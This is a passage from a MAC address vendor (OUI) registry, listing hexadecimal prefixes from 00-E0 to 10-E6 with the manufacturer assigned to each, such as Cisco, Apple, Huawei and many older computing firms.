(hex) CROSSROADS SYSTEMS, INC. 00-E0-03 (hex) NOKIA WIRELESS BUSINESS COMMUN 00-E0-04 (hex) PMC-SIERRA, INC. 00-E0-05 (hex) TECHNICAL CORP. 00-E0-06 (hex) SILICON INTEGRATED SYS. CORP. 00-E0-07 (hex) Avaya ECS Ltd 00-E0-08 (hex) AMAZING CONTROLS! INC. 00-E0-09 (hex) MARATHON TECHNOLOGIES CORP. 00-E0-0A (hex) DIBA, INC. 00-E0-0B (hex) ROOFTOP COMMUNICATIONS CORP. 00-E0-0C (hex) MOTOROLA 00-E0-0D (hex) RADIANT SYSTEMS 00-E0-0E (hex) AVALON IMAGING SYSTEMS, INC. 00-E0-0F (hex) SHANGHAI BAUD DATA 00-E0-10 (hex) HESS SB-AUTOMATENBAU GmbH 00-E0-11 (hex) Uniden Corporation 00-E0-12 (hex) PLUTO TECHNOLOGIES INTERNATIONAL INC. 00-E0-13 (hex) EASTERN ELECTRONIC CO., LTD. 00-E0-14 (hex) CISCO SYSTEMS, INC. 00-E0-15 (hex) HEIWA CORPORATION 00-E0-16 (hex) RAPID CITY COMMUNICATIONS 00-E0-17 (hex) EXXACT GmbH 00-E0-18 (hex) ASUSTEK COMPUTER INC. 00-E0-19 (hex) ING. GIORDANO ELETTRONICA 00-E0-1A (hex) COMTEC SYSTEMS. CO., LTD. 00-E0-1B (hex) SPHERE COMMUNICATIONS, INC. 00-E0-1C (hex) Cradlepoint, Inc 00-E0-1D (hex) WebTV NETWORKS, INC. 00-E0-1E (hex) CISCO SYSTEMS, INC. 00-E0-1F (hex) AVIDIA Systems, Inc. 00-E0-20 (hex) TECNOMEN OY 00-E0-21 (hex) FREEGATE CORP. 00-E0-22 (hex) Analog Devices Inc. 00-E0-23 (hex) TELRAD 00-E0-24 (hex) GADZOOX NETWORKS 00-E0-25 (hex) dit Co., Ltd. 00-E0-26 (hex) Redlake MASD LLC 00-E0-27 (hex) DUX, INC. 00-E0-28 (hex) APTIX CORPORATION 00-E0-29 (hex) STANDARD MICROSYSTEMS CORP. 00-E0-2A (hex) TANDBERG TELEVISION AS 00-E0-2B (hex) EXTREME NETWORKS 00-E0-2C (hex) AST COMPUTER 00-E0-2D (hex) InnoMediaLogic, Inc. 00-E0-2E (hex) SPC ELECTRONICS CORPORATION 00-E0-2F (hex) MCNS HOLDINGS, L.P. 00-E0-30 (hex) MELITA INTERNATIONAL CORP. 00-E0-31 (hex) HAGIWARA ELECTRIC CO., LTD. 00-E0-32 (hex) MISYS FINANCIAL SYSTEMS, LTD. 00-E0-33 (hex) E.E.P.D. GmbH 00-E0-34 (hex) CISCO SYSTEMS, INC. 00-E0-35 (hex) Emerson Network Power 00-E0-36 (hex) PIONEER CORPORATION 00-E0-37 (hex) CENTURY CORPORATION 00-E0-38 (hex) PROXIMA CORPORATION 00-E0-39 (hex) PARADYNE CORP. 00-E0-3A (hex) CABLETRON SYSTEMS, INC. 00-E0-3B (hex) PROMINET CORPORATION 00-E0-3C (hex) AdvanSys 00-E0-3D (hex) FOCON ELECTRONIC SYSTEMS A/S 00-E0-3E (hex) ALFATECH, INC. 00-E0-3F (hex) JATON CORPORATION 00-E0-40 (hex) DeskStation Technology, Inc. 00-E0-41 (hex) CSPI 00-E0-42 (hex) Pacom Systems Ltd. 00-E0-43 (hex) VitalCom 00-E0-44 (hex) LSICS CORPORATION 00-E0-45 (hex) TOUCHWAVE, INC. 00-E0-46 (hex) BENTLY NEVADA CORP. 00-E0-47 (hex) InFocus Corporation 00-E0-48 (hex) SDL COMMUNICATIONS, INC. 00-E0-49 (hex) MICROWI ELECTRONIC GmbH 00-E0-4A (hex) ENHANCED MESSAGING SYSTEMS, INC 00-E0-4B (hex) JUMP INDUSTRIELLE COMPUTERTECHNIK GmbH 00-E0-4C (hex) REALTEK SEMICONDUCTOR CORP. 00-E0-4D (hex) INTERNET INITIATIVE JAPAN, INC 00-E0-4E (hex) SANYO DENKI CO., LTD. 00-E0-4F (hex) CISCO SYSTEMS, INC. 00-E0-50 (hex) EXECUTONE INFORMATION SYSTEMS, INC. 00-E0-51 (hex) TALX CORPORATION 00-E0-52 (hex) Brocade Communications Systems, Inc 00-E0-53 (hex) CELLPORT LABS, INC. 00-E0-54 (hex) KODAI HITEC CO., LTD. 00-E0-55 (hex) INGENIERIA ELECTRONICA COMERCIAL INELCOM S.A. 00-E0-56 (hex) HOLONTECH CORPORATION 00-E0-57 (hex) HAN MICROTELECOM. CO., LTD. 00-E0-58 (hex) PHASE ONE DENMARK A/S 00-E0-59 (hex) CONTROLLED ENVIRONMENTS, LTD. 00-E0-5A (hex) GALEA NETWORK SECURITY 00-E0-5B (hex) WEST END SYSTEMS CORP. 00-E0-5C (hex) MATSUSHITA KOTOBUKI ELECTRONICS INDUSTRIES, LTD. 00-E0-5D (hex) UNITEC CO., LTD. 00-E0-5E (hex) JAPAN AVIATION ELECTRONICS INDUSTRY, LTD. 00-E0-5F (hex) e-Net, Inc. 00-E0-60 (hex) SHERWOOD 00-E0-61 (hex) EdgePoint Networks, Inc. 00-E0-62 (hex) HOST ENGINEERING 00-E0-63 (hex) CABLETRON - YAGO SYSTEMS, INC. 00-E0-64 (hex) SAMSUNG ELECTRONICS 00-E0-65 (hex) OPTICAL ACCESS INTERNATIONAL 00-E0-66 (hex) ProMax Systems, Inc. 00-E0-67 (hex) eac AUTOMATION-CONSULTING GmbH 00-E0-68 (hex) MERRIMAC SYSTEMS INC. 00-E0-69 (hex) JAYCOR 00-E0-6A (hex) KAPSCH AG 00-E0-6B (hex) W&G SPECIAL PRODUCTS 00-E0-6C (hex) AEP Systems International Ltd 00-E0-6D (hex) COMPUWARE CORPORATION 00-E0-6E (hex) FAR SYSTEMS S.p.A. 00-E0-6F (hex) Motorola, Inc. 00-E0-70 (hex) DH TECHNOLOGY 00-E0-71 (hex) EPIS MICROCOMPUTER 00-E0-72 (hex) LYNK 00-E0-73 (hex) NATIONAL AMUSEMENT NETWORK, INC. 00-E0-74 (hex) TIERNAN COMMUNICATIONS, INC. 00-E0-75 (hex) Verilink Corporation 00-E0-76 (hex) DEVELOPMENT CONCEPTS, INC. 00-E0-77 (hex) WEBGEAR, INC. 00-E0-78 (hex) BERKELEY NETWORKS 00-E0-79 (hex) A.T.N.R. 00-E0-7A (hex) MIKRODIDAKT AB 00-E0-7B (hex) BAY NETWORKS 00-E0-7C (hex) METTLER-TOLEDO, INC. 00-E0-7D (hex) NETRONIX, INC. 00-E0-7E (hex) WALT DISNEY IMAGINEERING 00-E0-7F (hex) LOGISTISTEM s.r.l. 00-E0-80 (hex) CONTROL RESOURCES CORPORATION 00-E0-81 (hex) TYAN COMPUTER CORP. 00-E0-82 (hex) ANERMA 00-E0-83 (hex) JATO TECHNOLOGIES, INC. 00-E0-84 (hex) COMPULITE R&D 00-E0-85 (hex) GLOBAL MAINTECH, INC. 00-E0-86 (hex) CYBEX COMPUTER PRODUCTS 00-E0-87 (hex) LeCroy - Networking Productions Division 00-E0-88 (hex) LTX CORPORATION 00-E0-89 (hex) ION Networks, Inc. 00-E0-8A (hex) GEC AVERY, LTD. 00-E0-8B (hex) QLogic Corp. 00-E0-8C (hex) NEOPARADIGM LABS, INC. 00-E0-8D (hex) PRESSURE SYSTEMS, INC. 00-E0-8E (hex) UTSTARCOM 00-E0-8F (hex) CISCO SYSTEMS, INC. 00-E0-90 (hex) BECKMAN LAB. AUTOMATION DIV. 00-E0-91 (hex) LG ELECTRONICS, INC. 00-E0-92 (hex) ADMTEK INCORPORATED 00-E0-93 (hex) ACKFIN NETWORKS 00-E0-94 (hex) OSAI SRL 00-E0-95 (hex) ADVANCED-VISION TECHNOLGIES CORP. 00-E0-96 (hex) SHIMADZU CORPORATION 00-E0-97 (hex) CARRIER ACCESS CORPORATION 00-E0-98 (hex) AboCom Systems, Inc. 00-E0-99 (hex) SAMSON AG 00-E0-9A (hex) Positron Inc. 00-E0-9B (hex) ENGAGE NETWORKS, INC. 00-E0-9C (hex) MII 00-E0-9D (hex) SARNOFF CORPORATION 00-E0-9E (hex) QUANTUM CORPORATION 00-E0-9F (hex) PIXEL VISION 00-E0-A0 (hex) WILTRON CO. 00-E0-A1 (hex) HIMA PAUL HILDEBRANDT GmbH Co. KG 00-E0-A2 (hex) MICROSLATE INC. 00-E0-A3 (hex) CISCO SYSTEMS, INC. 00-E0-A4 (hex) ESAOTE S.p.A. 00-E0-A5 (hex) ComCore Semiconductor, Inc. 00-E0-A6 (hex) TELOGY NETWORKS, INC. 00-E0-A7 (hex) IPC INFORMATION SYSTEMS, INC. 00-E0-A8 (hex) SAT GmbH & Co. 00-E0-A9 (hex) FUNAI ELECTRIC CO., LTD. 00-E0-AA (hex) ELECTROSONIC LTD. 00-E0-AB (hex) DIMAT S.A. 00-E0-AC (hex) MIDSCO, INC. 00-E0-AD (hex) EES TECHNOLOGY, LTD. 00-E0-AE (hex) XAQTI CORPORATION 00-E0-AF (hex) GENERAL DYNAMICS INFORMATION SYSTEMS 00-E0-B0 (hex) CISCO SYSTEMS, INC. 00-E0-B1 (hex) Alcatel-Lucent, Enterprise Business Group 00-E0-B2 (hex) TELMAX COMMUNICATIONS CORP. 00-E0-B3 (hex) EtherWAN Systems, Inc. 00-E0-B4 (hex) TECHNO SCOPE CO., LTD. 00-E0-B5 (hex) ARDENT COMMUNICATIONS CORP. 00-E0-B6 (hex) Entrada Networks 00-E0-B7 (hex) PI GROUP, LTD. 00-E0-B8 (hex) GATEWAY 2000 00-E0-B9 (hex) BYAS SYSTEMS 00-E0-BA (hex) BERGHOF AUTOMATIONSTECHNIK GmbH 00-E0-BB (hex) NBX CORPORATION 00-E0-BC (hex) SYMON COMMUNICATIONS, INC. 00-E0-BD (hex) INTERFACE SYSTEMS, INC. 00-E0-BE (hex) GENROCO INTERNATIONAL, INC. 00-E0-BF (hex) TORRENT NETWORKING TECHNOLOGIES CORP. 00-E0-C0 (hex) SEIWA ELECTRIC MFG. CO., LTD. 00-E0-C1 (hex) MEMOREX TELEX JAPAN, LTD. 00-E0-C2 (hex) NECSY S.p.A. 00-E0-C3 (hex) SAKAI SYSTEM DEVELOPMENT CORP. 00-E0-C4 (hex) HORNER ELECTRIC, INC. 00-E0-C5 (hex) BCOM ELECTRONICS INC. 00-E0-C6 (hex) LINK2IT, L.L.C. 00-E0-C7 (hex) EUROTECH SRL 00-E0-C8 (hex) VIRTUAL ACCESS, LTD. 00-E0-C9 (hex) AutomatedLogic Corporation 00-E0-CA (hex) BEST DATA PRODUCTS 00-E0-CB (hex) RESON, INC. 00-E0-CC (hex) HERO SYSTEMS, LTD. 00-E0-CD (hex) SENSIS CORPORATION 00-E0-CE (hex) ARN 00-E0-CF (hex) INTEGRATED DEVICE TECHNOLOGY, INC. 00-E0-D0 (hex) NETSPEED, INC. 00-E0-D1 (hex) TELSIS LIMITED 00-E0-D2 (hex) VERSANET COMMUNICATIONS, INC. 00-E0-D3 (hex) DATENTECHNIK GmbH 00-E0-D4 (hex) EXCELLENT COMPUTER 00-E0-D5 (hex) Emulex Corporation 00-E0-D6 (hex) COMPUTER & COMMUNICATION RESEARCH LAB. 00-E0-D7 (hex) SUNSHINE ELECTRONICS, INC. 00-E0-D8 (hex) LANBit Computer, Inc. 00-E0-D9 (hex) TAZMO CO., LTD. 00-E0-DA (hex) Alcatel North America ESD 00-E0-DB (hex) ViaVideo Communications, Inc. 00-E0-DC (hex) NEXWARE CORP. 00-E0-DD (hex) ZENITH ELECTRONICS CORPORATION 00-E0-DE (hex) DATAX NV 00-E0-DF (hex) KEYMILE GmbH 00-E0-E0 (hex) SI ELECTRONICS, LTD. 00-E0-E1 (hex) G2 NETWORKS, INC. 00-E0-E2 (hex) INNOVA CORP. 00-E0-E3 (hex) SK-ELEKTRONIK GmbH 00-E0-E4 (hex) FANUC ROBOTICS NORTH AMERICA, Inc. 00-E0-E5 (hex) CINCO NETWORKS, INC. 00-E0-E6 (hex) INCAA DATACOM B.V. 00-E0-E7 (hex) RAYTHEON E-SYSTEMS, INC. 00-E0-E8 (hex) GRETACODER Data Systems AG 00-E0-E9 (hex) DATA LABS, INC. 00-E0-EA (hex) INNOVAT COMMUNICATIONS, INC. 00-E0-EB (hex) DIGICOM SYSTEMS, INCORPORATED 00-E0-EC (hex) CELESTICA INC. 00-E0-ED (hex) SILICOM, LTD. 00-E0-EE (hex) MAREL HF 00-E0-EF (hex) DIONEX 00-E0-F0 (hex) ABLER TECHNOLOGY, INC. 00-E0-F1 (hex) THAT CORPORATION 00-E0-F2 (hex) ARLOTTO COMNET, INC. 00-E0-F3 (hex) WebSprint Communications, Inc. 00-E0-F4 (hex) INSIDE Technology A/S 00-E0-F5 (hex) TELES AG 00-E0-F6 (hex) DECISION EUROPE 00-E0-F7 (hex) CISCO SYSTEMS, INC. 00-E0-F8 (hex) DICNA CONTROL AB 00-E0-F9 (hex) CISCO SYSTEMS, INC. 00-E0-FA (hex) TRL TECHNOLOGY, LTD. 00-E0-FB (hex) LEIGHTRONIX, INC. 00-E0-FC (hex) HUAWEI TECHNOLOGIES CO., LTD. 00-E0-FD (hex) A-TREND TECHNOLOGY CO., LTD. 00-E0-FE (hex) CISCO SYSTEMS, INC. 00-E0-FF (hex) SECURITY DYNAMICS TECHNOLOGIES, Inc. 00-E1-75 (hex) AK-Systems Ltd 00-E6-D3 (hex) NIXDORF COMPUTER CORP. 00-F0-51 (hex) KWB Gmbh 00-F8-60 (hex) PT. Panggung Electric Citrabuana 00-FA-3B (hex) CLOOS ELECTRONIC GMBH 00-FC-58 (hex) WebSilicon Ltd. 00-FC-70 (hex) Intrepid Control Systems, Inc. 02-07-01 (hex) RACAL-DATACOM 02-1C-7C (hex) PERQ SYSTEMS CORPORATION 02-60-86 (hex) LOGIC REPLACEMENT TECH. LTD. 02-60-8C (hex) 3COM CORPORATION 02-70-01 (hex) RACAL-DATACOM 02-70-B0 (hex) M/A-COM INC. COMPANIES 02-70-B3 (hex) DATA RECALL LTD 02-9D-8E (hex) CARDIAC RECORDERS INC. 02-AA-3C (hex) OLIVETTI TELECOMM SPA (OLTECO) 02-BB-01 (hex) OCTOTHORPE CORP. 02-C0-8C (hex) 3COM CORPORATION 02-CF-1C (hex) COMMUNICATION MACHINERY CORP. 02-E6-D3 (hex) NIXDORF COMPUTER CORPORATION 04-0A-83 (hex) Alcatel-Lucent 04-0A-E0 (hex) XMIT AG COMPUTER NETWORKS 04-0C-CE (hex) Apple, Inc. 04-0E-C2 (hex) ViewSonic Mobile China Limited 04-18-0F (hex) Samsung Electronics Co.,Ltd 04-18-B6 (hex) PRIVATE 04-1D-10 (hex) Dream Ware Inc. 04-1E-64 (hex) Apple, Inc 04-20-9A (hex) Panasonic AVC Networks Company 04-22-34 (hex) Wireless Standard Extensions 04-26-05 (hex) GFR Gesellschaft für Regelungstechnik und Energieeinsparung mbH 04-2B-BB (hex) PicoCELA, Inc. 04-2F-56 (hex) ATOCS (Shenzhen) LTD 04-32-F4 (hex) Partron 04-36-04 (hex) Gyeyoung I&T 04-46-65 (hex) Murata Manufacturing Co., Ltd. 04-4F-AA (hex) Ruckus Wireless 04-54-53 (hex) Apple, Inc. 04-55-CA (hex) BriView (Xiamen) Corp. 04-5D-56 (hex) camtron industrial inc. 04-62-D7 (hex) ALSTOM HYDRO FRANCE 04-63-E0 (hex) Nome Oy 04-6D-42 (hex) Bryston Ltd. 04-70-BC (hex) Globalstar Inc. 04-74-A1 (hex) Aligera Equipamentos Digitais Ltda 04-75-F5 (hex) CSST 04-76-6E (hex) ALPS Co,. Ltd. 04-7D-7B (hex) Quanta Computer Inc. 04-81-AE (hex) Clack Corporation 04-88-8C (hex) Eifelwerk Butler Systeme GmbH 04-8A-15 (hex) Avaya, Inc 04-94-A1 (hex) CATCH THE WIND INC 04-9F-81 (hex) Simena, LLC 04-A3-F3 (hex) Emicon 04-A8-2A (hex) Nokia Corporation 04-B3-B6 (hex) Seamap (UK) Ltd 04-B4-66 (hex) BSP Co., Ltd. 04-C0-5B (hex) Tigo Energy 04-C0-6F (hex) Huawei Device Co., Ltd 04-C5-A4 (hex) Cisco Systems 04-C8-80 (hex) Samtec Inc 04-D7-83 (hex) Y&H E&C Co.,LTD. 04-DD-4C (hex) IPBlaze 04-E0-C4 (hex) TRIUMPH-ADLER AG 04-E1-C8 (hex) IMS Soluções em Energia Ltda. 04-E2-F8 (hex) AEP srl 04-E4-51 (hex) Texas Instruments 04-E5-48 (hex) Cohda Wireless Pty Ltd 04-E6-62 (hex) Acroname Inc. 04-EE-91 (hex) x-fabric GmbH 04-FE-7F (hex) Cisco Systems 04-FF-51 (hex) NOVAMEDIA INNOVISION SP. Z O.O. 08-00-01 (hex) COMPUTERVISION CORPORATION 08-00-02 (hex) BRIDGE COMMUNICATIONS INC. 08-00-03 (hex) ADVANCED COMPUTER COMM. 08-00-04 (hex) CROMEMCO INCORPORATED 08-00-05 (hex) SYMBOLICS INC. 08-00-06 (hex) SIEMENS AG 08-00-07 (hex) APPLE COMPUTER INC. 08-00-08 (hex) BOLT BERANEK AND NEWMAN INC. 08-00-09 (hex) HEWLETT PACKARD 08-00-0A (hex) NESTAR SYSTEMS INCORPORATED 08-00-0B (hex) UNISYS CORPORATION 08-00-0C (hex) MIKLYN DEVELOPMENT CO. 08-00-0D (hex) INTERNATIONAL COMPUTERS LTD. 08-00-0E (hex) NCR CORPORATION 08-00-0F (hex) MITEL CORPORATION 08-00-11 (hex) TEKTRONIX INC. 08-00-12 (hex) BELL ATLANTIC INTEGRATED SYST. 08-00-13 (hex) EXXON 08-00-14 (hex) EXCELAN 08-00-15 (hex) STC BUSINESS SYSTEMS 08-00-16 (hex) BARRISTER INFO SYS CORP 08-00-17 (hex) NATIONAL SEMICONDUCTOR 08-00-18 (hex) PIRELLI FOCOM NETWORKS 08-00-19 (hex) GENERAL ELECTRIC CORPORATION 08-00-1A (hex) TIARA/ 10NET 08-00-1B (hex) EMC Corporation 08-00-1C (hex) KDD-KOKUSAI DEBNSIN DENWA CO. 08-00-1D (hex) ABLE COMMUNICATIONS INC. 08-00-1E (hex) APOLLO COMPUTER INC. 08-00-1F (hex) SHARP CORPORATION 08-00-20 (hex) Oracle Corporation 08-00-21 (hex) 3M COMPANY 08-00-22 (hex) NBI INC. 08-00-23 (hex) Panasonic Communications Co., Ltd. 08-00-24 (hex) 10NET COMMUNICATIONS/DCA 08-00-25 (hex) CONTROL DATA 08-00-26 (hex) NORSK DATA A.S. 08-00-27 (hex) CADMUS COMPUTER SYSTEMS 08-00-28 (hex) Texas Instruments 08-00-29 (hex) MEGATEK CORPORATION 08-00-2A (hex) MOSAIC TECHNOLOGIES INC. 08-00-2B (hex) DIGITAL EQUIPMENT CORPORATION 08-00-2C (hex) BRITTON LEE INC. 08-00-2D (hex) LAN-TEC INC. 08-00-2E (hex) METAPHOR COMPUTER SYSTEMS 08-00-2F (hex) PRIME COMPUTER INC. 08-00-30 (hex) NETWORK RESEARCH CORPORATION 08-00-30 (hex) CERN 08-00-30 (hex) ROYAL MELBOURNE INST OF TECH 08-00-31 (hex) LITTLE MACHINES INC. 08-00-32 (hex) TIGAN INCORPORATED 08-00-33 (hex) BAUSCH & LOMB 08-00-34 (hex) FILENET CORPORATION 08-00-35 (hex) MICROFIVE CORPORATION 08-00-36 (hex) INTERGRAPH CORPORATION 08-00-37 (hex) FUJI-XEROX CO. LTD. 08-00-38 (hex) BULL S.A.S. 08-00-39 (hex) SPIDER SYSTEMS LIMITED 08-00-3A (hex) ORCATECH INC. 08-00-3B (hex) TORUS SYSTEMS LIMITED 08-00-3C (hex) SCHLUMBERGER WELL SERVICES 08-00-3D (hex) CADNETIX CORPORATIONS 08-00-3E (hex) CODEX CORPORATION 08-00-3F (hex) FRED KOSCHARA ENTERPRISES 08-00-40 (hex) FERRANTI COMPUTER SYS. LIMITED 08-00-41 (hex) RACAL-MILGO INFORMATION SYS.. 08-00-42 (hex) JAPAN MACNICS CORP. 08-00-43 (hex) PIXEL COMPUTER INC. 08-00-44 (hex) DAVID SYSTEMS INC. 08-00-45 (hex) CONCURRENT COMPUTER CORP. 08-00-46 (hex) Sony Corporation 08-00-47 (hex) SEQUENT COMPUTER SYSTEMS INC. 08-00-48 (hex) EUROTHERM GAUGING SYSTEMS 08-00-49 (hex) UNIVATION 08-00-4A (hex) BANYAN SYSTEMS INC. 08-00-4B (hex) PLANNING RESEARCH CORP. 08-00-4C (hex) HYDRA COMPUTER SYSTEMS INC. 08-00-4D (hex) CORVUS SYSTEMS INC. 08-00-4E (hex) 3COM EUROPE LTD. 08-00-4F (hex) CYGNET SYSTEMS 08-00-50 (hex) DAISY SYSTEMS CORP. 08-00-51 (hex) EXPERDATA 08-00-52 (hex) INSYSTEC 08-00-53 (hex) MIDDLE EAST TECH. UNIVERSITY 08-00-55 (hex) STANFORD TELECOMM. INC. 08-00-56 (hex) STANFORD LINEAR ACCEL. CENTER 08-00-57 (hex) EVANS & SUTHERLAND 08-00-58 (hex) SYSTEMS CONCEPTS 08-00-59 (hex) A/S MYCRON 08-00-5A (hex) IBM Corp 08-00-5B (hex) VTA TECHNOLOGIES INC. 08-00-5C (hex) FOUR PHASE SYSTEMS 08-00-5D (hex) GOULD INC. 08-00-5E (hex) COUNTERPOINT COMPUTER INC. 08-00-5F (hex) SABER TECHNOLOGY CORP. 08-00-60 (hex) INDUSTRIAL NETWORKING INC. 08-00-61 (hex) JAROGATE LTD. 08-00-62 (hex) GENERAL DYNAMICS 08-00-63 (hex) PLESSEY 08-00-64 (hex) AUTOPHON AG 08-00-65 (hex) GENRAD INC. 08-00-66 (hex) AGFA CORPORATION 08-00-67 (hex) COMDESIGN 08-00-68 (hex) RIDGE COMPUTERS 08-00-69 (hex) SILICON GRAPHICS INC. 08-00-6A (hex) ATT BELL LABORATORIES 08-00-6B (hex) ACCEL TECHNOLOGIES INC. 08-00-6C (hex) SUNTEK TECHNOLOGY INT'L 08-00-6D (hex) WHITECHAPEL COMPUTER WORKS 08-00-6E (hex) MASSCOMP 08-00-6F (hex) PHILIPS APELDOORN B.V. 08-00-70 (hex) MITSUBISHI ELECTRIC CORP. 08-00-71 (hex) MATRA (DSIE) 08-00-72 (hex) XEROX CORP UNIV GRANT PROGRAM 08-00-73 (hex) TECMAR INC. 08-00-74 (hex) CASIO COMPUTER CO. LTD. 08-00-75 (hex) DANSK DATA ELECTRONIK 08-00-76 (hex) PC LAN TECHNOLOGIES 08-00-77 (hex) TSL COMMUNICATIONS LTD. 08-00-78 (hex) ACCELL CORPORATION 08-00-79 (hex) THE DROID WORKS 08-00-7A (hex) INDATA 08-00-7B (hex) SANYO ELECTRIC CO. LTD. 08-00-7C (hex) VITALINK COMMUNICATIONS CORP. 08-00-7E (hex) AMALGAMATED WIRELESS(AUS) LTD 08-00-7F (hex) CARNEGIE-MELLON UNIVERSITY 08-00-80 (hex) AES DATA INC. 08-00-81 (hex) ,ASTECH INC. 08-00-82 (hex) VERITAS SOFTWARE 08-00-83 (hex) Seiko Instruments Inc. 08-00-84 (hex) TOMEN ELECTRONICS CORP. 08-00-85 (hex) ELXSI 08-00-86 (hex) KONICA MINOLTA HOLDINGS, INC. 08-00-87 (hex) XYPLEX 08-00-88 (hex) Brocade Communications Systems, Inc. 08-00-89 (hex) KINETICS 08-00-8A (hex) PERFORMANCE TECHNOLOGY 08-00-8B (hex) PYRAMID TECHNOLOGY CORP. 08-00-8C (hex) NETWORK RESEARCH CORPORATION 08-00-8D (hex) XYVISION INC. 08-00-8E (hex) TANDEM COMPUTERS 08-00-8F (hex) CHIPCOM CORPORATION 08-00-90 (hex) SONOMA SYSTEMS 08-0D-84 (hex) GECO, Inc. 08-11-96 (hex) Intel Corporate 08-14-43 (hex) UNIBRAIN S.A. 08-16-51 (hex) Shenzhen Sea Star Technology Co.,Ltd 08-17-35 (hex) Cisco Systems 08-17-F4 (hex) IBM Corp 08-18-1A (hex) zte corporation 08-18-4C (hex) A. S. Thomas, Inc. 08-19-A6 (hex) HUAWEI TECHNOLOGIES CO.,LTD 08-1F-F3 (hex) Cisco Systems 08-25-22 (hex) ADVANSEE 08-2A-D0 (hex) SRD Innovations Inc. 08-2E-5F (hex) Hewlett Packard 08-38-A5 (hex) Funkwerk plettac electronic GmbH 08-4E-1C (hex) H2A Systems, LLC 08-4E-BF (hex) Broad Net Mux Corporation 08-51-2E (hex) Orion Diagnostica Oy 08-75-72 (hex) Obelux Oy 08-76-18 (hex) ViE Technologies Sdn. Bhd. 08-76-95 (hex) Auto Industrial Co., Ltd. 08-76-FF (hex) Thomson Telecom Belgium 08-86-3B (hex) Belkin International 08-8D-C8 (hex) Ryowa Electronics Co.,Ltd 08-9F-97 (hex) LEROY AUTOMATION 08-A1-2B (hex) ShenZhen EZL Technology Co., Ltd 08-A9-5A (hex) Azurewave 08-AC-A5 (hex) Benu Video, Inc. 08-B7-EC (hex) Wireless Seismic 08-BB-CC (hex) AK-NORD EDV VERTRIEBSGES. mbH 08-D0-9F (hex) Cisco Systems 08-D2-9A (hex) Proformatique 08-D5-C0 (hex) Seers Technology Co., Ltd 08-E6-72 (hex) JEBSEE ELECTRONICS CO.,LTD. 08-EA-44 (hex) Aerohive Networks, Inc. 08-F2-F4 (hex) Net One Partners Co.,Ltd. 08-F6-F8 (hex) GET Engineering 08-FA-E0 (hex) Fohhn Audio AG 08-FC-52 (hex) OpenXS BV 0C-15-C5 (hex) SDTEC Co., Ltd. 0C-17-F1 (hex) TELECSYS 0C-1D-C2 (hex) SeAH Networks 0C-27-55 (hex) Valuable Techologies Limited 0C-37-DC (hex) Huawei Technologies Co., Ltd 0C-39-56 (hex) Observator instruments 0C-3C-65 (hex) Dome Imaging Inc 0C-46-9D (hex) MS Sedco 0C-4C-39 (hex) Mitrastar Technology 0C-51-F7 (hex) CHAUVIN ARNOUX 0C-5A-19 (hex) Axtion Sdn Bhd 0C-60-76 (hex) Hon Hai Precision Ind. Co.,Ltd. 0C-6E-4F (hex) PrimeVOLT Co., Ltd. 0C-74-C2 (hex) Apple Inc 0C-7D-7C (hex) Kexiang Information Technology Co, Ltd. 0C-81-12 (hex) PRIVATE 0C-82-30 (hex) SHENZHEN MAGNUS TECHNOLOGIES CO.,LTD 0C-82-6A (hex) Wuhan Huagong Genuine Optics Technology Co., Ltd 0C-84-11 (hex) A.O. Smith Water Products 0C-85-25 (hex) Cisco Systems 0C-8D-98 (hex) TOP EIGHT IND CORP 0C-92-4E (hex) Rice Lake Weighing Systems 0C-A4-02 (hex) Alcatel Lucent IPD 0C-A4-2A (hex) OB Telecom Electronic Technology Co., Ltd 0C-BF-15 (hex) Genetec 0C-C3-A7 (hex) Meritec 0C-C6-AC (hex) DAGS 0C-C9-C6 (hex) Samwin Hong Kong Limited 0C-CD-D3 (hex) EASTRIVER TECHNOLOGY CO., LTD. 0C-D2-92 (hex) Intel Corporate 0C-D5-02 (hex) Westell 0C-D6-96 (hex) Amimon Ltd 0C-D7-C2 (hex) Axium Technologies, Inc. 0C-DD-EF (hex) Nokia Corporation 0C-DF-A4 (hex) Samsung Electronics Co.,Ltd 0C-E7-09 (hex) Fox Crypto B.V. 0C-E8-2F (hex) Bonfiglioli Vectron GmbH 0C-E9-36 (hex) ELIMOS srl 0C-EE-E6 (hex) Hon Hai Precision Ind. Co.,Ltd. 0C-EF-7C (hex) AnaCom Inc 0C-F0-B4 (hex) Globalsat International Technology Ltd 0C-F3-EE (hex) EM Microelectronic 0C-FC-83 (hex) Airoha Technology Corp., 10-00-00 (hex) PRIVATE 10-00-5A (hex) IBM Corp 10-00-E8 (hex) NATIONAL SEMICONDUCTOR 10-00-FD (hex) LaonPeople 10-09-0C (hex) Janome Sewing Machine Co., Ltd. 10-0B-A9 (hex) Intel Corporate 10-0C-24 (hex) pomdevices, LLC 10-0D-32 (hex) Embedian, Inc. 10-0E-2B (hex) NEC CASIO Mobile Communications 10-10-B6 (hex) McCain Inc 10-12-12 (hex) Vivo International Corporation Pty Ltd 10-13-EE (hex) Justec International Technology INC. 10-18-9E (hex) Elmo Motion Control 10-1D-C0 (hex) Samsung Electronics Co.,Ltd 10-1F-74 (hex) Hewlett-Packard Company 10-2D-96 (hex) Looxcie Inc. 10-2E-AF (hex) Texas Instruments 10-37-11 (hex) Simlink AS 10-43-69 (hex) Soundmax Electronic Limited 10-44-5A (hex) Shaanxi Hitech Electronic Co., LTD 10-45-BE (hex) Norphonic AS 10-45-F8 (hex) LNT-Automation GmbH 10-56-CA (hex) Peplink International Ltd. 10-62-C9 (hex) Adatis GmbH & Co. KG 10-64-E2 (hex) ADFweb.com s.r.l. 10-65-A3 (hex) Panamax Inc. 10-6F-3F (hex) BUFFALO INC 10-71-F9 (hex) Cloud Telecomputers, LLC 10-76-8A (hex) EoCell 10-78-D2 (hex) ELITEGROUP COMPUTER SYSTEM CO., LTD. 10-83-D2 (hex) Microseven Systems, LLC 10-88-0F (hex) DARUMA TELECOMUNICAÇÕES E INFORMÃÂTICA S/A 10-8C-CF (hex) Cisco Systems 10-93-E9 (hex) Apple, Inc. 10-9A-DD (hex) Apple Inc 10-A1-3B (hex) FUJIKURA RUBBER LTD. 10-B7-F6 (hex) Plastoform Industries Ltd. 10-BA-A5 (hex) GANA I&C CO., LTD 10-C2-BA (hex) UTT Co., Ltd. 10-C5-86 (hex) BIO SOUND LAB CO., LTD. 10-C6-1F (hex) Huawei Technologies Co., Ltd 10-C6-FC (hex) Garmin International 10-C7-3F (hex) Midas Klark Teknik Ltd 10-CA-81 (hex) PRECIA 10-CC-DB (hex) AXIMUM PRODUITS ELECTRONIQUES 10-E2-D5 (hex) Qi Hardware Inc. 10-E3-C7 (hex) Seohwa Telecom 10-E6-AE (hex) Source Technologies, LLC 